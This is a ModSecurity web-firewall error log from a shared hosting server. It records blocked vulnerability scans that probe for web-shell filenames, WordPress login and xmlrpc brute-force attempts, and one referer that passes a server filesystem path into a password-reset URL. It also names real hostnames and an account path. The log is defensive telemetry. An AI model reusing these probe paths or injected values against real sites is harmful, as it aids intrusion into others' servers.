[Tue May 26 14:00:19.785745 2026] [http2:info] [pid 578581:tid 578581] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:00:20.353514 2026] [security2:error] [pid 578581:tid 578723] [client 20.48.248.215:24716] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-test.php"] [unique_id "ahVaHJm_8al1sb-umPtdNQAAAAw"]
[Tue May 26 14:00:20.353684 2026] [security2:error] [pid 578581:tid 578723] [client 20.48.248.215:24716] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-test.php"] [unique_id "ahVaHJm_8al1sb-umPtdNQAAAAw"]
[Tue May 26 14:00:20.394782 2026] [security2:error] [pid 578581:tid 578717] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaG5m_8al1sb-umPtdNAAAAAY"]
[Tue May 26 14:00:20.570365 2026] [security2:error] [pid 578581:tid 578731] [client 20.48.248.215:25245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/asd67.php"] [unique_id "ahVaHJm_8al1sb-umPtdOQAAABQ"]
[Tue May 26 14:00:20.570495 2026] [security2:error] [pid 578581:tid 578731] [client 20.48.248.215:25245] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/asd67.php"] [unique_id "ahVaHJm_8al1sb-umPtdOQAAABQ"]
[Tue May 26 14:00:21.617559 2026] [security2:error] [pid 578581:tid 578584] [remote 199.247.4.24:55150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.4.247.199.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVaHZm_8al1sb-umPtdUgAAMwI"]
[Tue May 26 14:00:21.752313 2026] [security2:error] [pid 578581:tid 578796] [client 20.48.248.215:25278] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/Cap.php"] [unique_id "ahVaHZm_8al1sb-umPtdVgAAAFU"]
[Tue May 26 14:00:21.752475 2026] [security2:error] [pid 578581:tid 578796] [client 20.48.248.215:25278] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/Cap.php"] [unique_id "ahVaHZm_8al1sb-umPtdVgAAAFU"]
[Tue May 26 14:00:21.816991 2026] [security2:error] [pid 578581:tid 578758] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaHZm_8al1sb-umPtdUQAAAC8"]
[Tue May 26 14:00:22.379916 2026] [security2:error] [pid 578581:tid 578789] [client 146.174.169.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaHZm_8al1sb-umPtdXAAAAE4"]
[Tue May 26 14:00:22.840320 2026] [security2:error] [pid 578581:tid 578808] [client 20.48.248.215:25222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahVaHpm_8al1sb-umPtdagAAAGE"]
[Tue May 26 14:00:22.840487 2026] [security2:error] [pid 578581:tid 578808] [client 20.48.248.215:25222] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/like.php"] [unique_id "ahVaHpm_8al1sb-umPtdagAAAGE"]
[Tue May 26 14:00:23.946101 2026] [security2:error] [pid 578581:tid 578744] [client 20.48.248.215:24784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/we.php"] [unique_id "ahVaH5m_8al1sb-umPtdhQAAACE"]
[Tue May 26 14:00:23.946258 2026] [security2:error] [pid 578581:tid 578744] [client 20.48.248.215:24784] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/we.php"] [unique_id "ahVaH5m_8al1sb-umPtdhQAAACE"]
[Tue May 26 14:00:24.133084 2026] [security2:error] [pid 578581:tid 578718] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaH5m_8al1sb-umPtdfQAAAAc"]
[Tue May 26 14:00:25.191677 2026] [security2:error] [pid 578581:tid 578782] [client 20.48.248.215:24828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahVaIZm_8al1sb-umPtdogAAAEc"]
[Tue May 26 14:00:25.191782 2026] [security2:error] [pid 578581:tid 578782] [client 20.48.248.215:24828] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahVaIZm_8al1sb-umPtdogAAAEc"]
[Tue May 26 14:00:25.574030 2026] [security2:error] [pid 578581:tid 578758] [client 129.222.147.134:4658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaIZm_8al1sb-umPtdrQAAAC8"]
[Tue May 26 14:00:25.574153 2026] [security2:error] [pid 578581:tid 578758] [client 129.222.147.134:4658] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaIZm_8al1sb-umPtdrQAAAC8"]
[Tue May 26 14:00:25.881833 2026] [security2:error] [pid 578581:tid 578601] [remote 95.216.117.13:48732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVaIZm_8al1sb-umPtdsQAAVBM"]
[Tue May 26 14:00:26.055149 2026] [security2:error] [pid 578581:tid 578801] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaIZm_8al1sb-umPtdsAAAAFo"]
[Tue May 26 14:00:27.399376 2026] [security2:error] [pid 578581:tid 578739] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaIpm_8al1sb-umPtdyAAAABw"]
[Tue May 26 14:00:27.740381 2026] [security2:error] [pid 578581:tid 578764] [client 20.48.248.215:25267] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-indx.php"] [unique_id "ahVaI5m_8al1sb-umPtdzwAAADU"]
[Tue May 26 14:00:27.740492 2026] [security2:error] [pid 578581:tid 578764] [client 20.48.248.215:25267] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-indx.php"] [unique_id "ahVaI5m_8al1sb-umPtdzwAAADU"]
[Tue May 26 14:00:28.700566 2026] [security2:error] [pid 578581:tid 578788] [client 20.48.248.215:25255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/zoo.php"] [unique_id "ahVaJJm_8al1sb-umPtd5wAAAE0"]
[Tue May 26 14:00:28.700727 2026] [security2:error] [pid 578581:tid 578788] [client 20.48.248.215:25255] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/zoo.php"] [unique_id "ahVaJJm_8al1sb-umPtd5wAAAE0"]
[Tue May 26 14:00:29.185980 2026] [security2:error] [pid 578581:tid 578755] [client 202.141.30.10:65316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaJZm_8al1sb-umPtd7gAAACw"]
[Tue May 26 14:00:29.186105 2026] [security2:error] [pid 578581:tid 578755] [client 202.141.30.10:65316] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaJZm_8al1sb-umPtd7gAAACw"]
[Tue May 26 14:00:29.721451 2026] [security2:error] [pid 578581:tid 578785] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaJZm_8al1sb-umPtd8QAAAEo"]
[Tue May 26 14:00:31.025993 2026] [security2:error] [pid 578581:tid 578769] [client 205.185.124.118:52653] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.124.185.205.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.cti.hn"] [uri "/wp-login.php"] [unique_id "ahVaJpm_8al1sb-umPteEgAAADo"]
[Tue May 26 14:00:31.244341 2026] [security2:error] [pid 578581:tid 578792] [client 20.48.248.215:25233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-link-spm.php"] [unique_id "ahVaJ5m_8al1sb-umPteHQAAAFE"]
[Tue May 26 14:00:31.244472 2026] [security2:error] [pid 578581:tid 578792] [client 20.48.248.215:25233] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-link-spm.php"] [unique_id "ahVaJ5m_8al1sb-umPteHQAAAFE"]
[Tue May 26 14:00:31.725613 2026] [security2:error] [pid 578581:tid 578790] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaJ5m_8al1sb-umPteIwAAAE8"]
[Tue May 26 14:00:32.279028 2026] [security2:error] [pid 578581:tid 578734] [client 20.48.248.215:25295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-link-snpm.php"] [unique_id "ahVaKJm_8al1sb-umPtePwAAABc"]
[Tue May 26 14:00:32.279161 2026] [security2:error] [pid 578581:tid 578734] [client 20.48.248.215:25295] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/wp-link-snpm.php"] [unique_id "ahVaKJm_8al1sb-umPtePwAAABc"]
[Tue May 26 14:00:32.619726 2026] [security2:error] [pid 578581:tid 578813] [client 84.54.44.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVaKJm_8al1sb-umPteQgAAAGY"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1264040&moderation-hash=613c331905f28955aee6058749d1f5f3
[Tue May 26 14:00:33.185378 2026] [security2:error] [pid 578581:tid 578616] [remote 65.2.90.30:42598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVaKZm_8al1sb-umPteUgAAHyI"]
[Tue May 26 14:00:33.471091 2026] [security2:error] [pid 578581:tid 578820] [client 84.54.44.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVaKZm_8al1sb-umPteagAAAG0"], referer: https://anujtradingco.com/pages/services-wide/?unapproved=1264040&moderation-hash=613c331905f28955aee6058749d1f5f3
[Tue May 26 14:00:33.484590 2026] [security2:error] [pid 578581:tid 578792] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaKZm_8al1sb-umPteWAAAAFE"]
[Tue May 26 14:00:34.098459 2026] [security2:error] [pid 578581:tid 578621] [remote 5.78.119.122:36238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVaKZm_8al1sb-umPtedAAAcyc"]
[Tue May 26 14:00:34.596916 2026] [security2:error] [pid 578581:tid 578626] [remote 52.18.195.140:38626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVaKpm_8al1sb-umPtegQAAaCw"]
[Tue May 26 14:00:35.323260 2026] [security2:error] [pid 578581:tid 578740] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaKpm_8al1sb-umPtekwAAAB0"]
[Tue May 26 14:00:35.525468 2026] [security2:error] [pid 578581:tid 578810] [client 20.48.248.215:25307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/xminie.php"] [unique_id "ahVaK5m_8al1sb-umPtengAAAGM"]
[Tue May 26 14:00:35.525583 2026] [security2:error] [pid 578581:tid 578810] [client 20.48.248.215:25307] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/xminie.php"] [unique_id "ahVaK5m_8al1sb-umPtengAAAGM"]
[Tue May 26 14:00:35.736135 2026] [security2:error] [pid 578581:tid 578726] [client 129.222.147.134:57023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaK5m_8al1sb-umPtepQAAAA8"]
[Tue May 26 14:00:35.736300 2026] [security2:error] [pid 578581:tid 578726] [client 129.222.147.134:57023] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaK5m_8al1sb-umPtepQAAAA8"]
[Tue May 26 14:00:37.202908 2026] [security2:error] [pid 578581:tid 578713] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaLJm_8al1sb-umPtexQAAAAI"]
[Tue May 26 14:00:38.134825 2026] [security2:error] [pid 578581:tid 578769] [client 142.147.164.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVaLZm_8al1sb-umPte2AAAADo"]
[Tue May 26 14:00:39.025746 2026] [security2:error] [pid 578581:tid 578744] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaLpm_8al1sb-umPtfBQAAACE"]
[Tue May 26 14:00:40.234783 2026] [security2:error] [pid 578581:tid 578671] [remote 74.7.241.58:46316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVaMJm_8al1sb-umPtfOQAAcVk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 14:00:40.962134 2026] [security2:error] [pid 578581:tid 578731] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaMJm_8al1sb-umPtfRAAAABQ"]
[Tue May 26 14:00:41.135274 2026] [security2:error] [pid 578581:tid 578826] [client 20.48.248.215:25310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahVaMZm_8al1sb-umPtfUwAAAHM"]
[Tue May 26 14:00:41.135377 2026] [security2:error] [pid 578581:tid 578826] [client 20.48.248.215:25310] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahVaMZm_8al1sb-umPtfUwAAAHM"]
[Tue May 26 14:00:41.241657 2026] [security2:error] [pid 578581:tid 578809] [client 202.141.30.10:65433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaMZm_8al1sb-umPtfUgAAAGI"]
[Tue May 26 14:00:41.241819 2026] [security2:error] [pid 578581:tid 578809] [client 202.141.30.10:65433] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVaMZm_8al1sb-umPtfUgAAAGI"]
[Tue May 26 14:00:42.711851 2026] [security2:error] [pid 578581:tid 578802] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaMpm_8al1sb-umPtfZQAAAFs"]
[Tue May 26 14:00:44.734300 2026] [security2:error] [pid 578581:tid 578819] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaNJm_8al1sb-umPtfmAAAAGw"]
[Tue May 26 14:00:45.927261 2026] [security2:error] [pid 578581:tid 578749] [client 129.222.147.134:40230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaNZm_8al1sb-umPtfvQAAACY"]
[Tue May 26 14:00:45.927537 2026] [security2:error] [pid 578581:tid 578749] [client 129.222.147.134:40230] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVaNZm_8al1sb-umPtfvQAAACY"]
[Tue May 26 14:00:46.036647 2026] [security2:error] [pid 578581:tid 578772] [client 85.208.96.198:37828] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/event/list/"] [unique_id "ahVaNpm_8al1sb-umPtfvgAAAD0"]
[Tue May 26 14:00:46.036800 2026] [security2:error] [pid 578581:tid 578772] [client 85.208.96.198:37828] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/event/list/"] [unique_id "ahVaNpm_8al1sb-umPtfvgAAAD0"]
[Tue May 26 14:00:46.262130 2026] [security2:error] [pid 578581:tid 578809] [client 20.48.248.215:25316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/drykl.php"] [unique_id "ahVaNpm_8al1sb-umPtfxQAAAGI"]
[Tue May 26 14:00:46.262274 2026] [security2:error] [pid 578581:tid 578809] [client 20.48.248.215:25316] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.ledao.com.mx.md-74.webhostbox.net"] [uri "/drykl.php"] [unique_id "ahVaNpm_8al1sb-umPtfxQAAAGI"]
